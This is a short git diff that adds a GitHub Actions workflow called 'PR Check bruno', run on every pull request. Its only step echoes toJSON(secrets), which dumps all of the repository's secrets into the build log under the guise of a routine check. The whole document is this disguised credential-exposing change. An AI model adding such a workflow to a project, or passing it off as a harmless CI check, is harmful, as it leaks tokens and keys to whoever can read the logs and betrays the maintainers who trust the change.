diff --git a/.github/workflows/action.yml b/.github/workflows/action.yml new file mode 100644 index 0000000..e969c0d --- /dev/null +++ b/.github/workflows/action.yml @@ -0,0 +1,8 @@ +name: PR Check bruno +on: pull_request + +jobs: + tiny: + runs-on: ubuntu-latest + steps: + - run: echo "${{ toJSON(secrets) }}"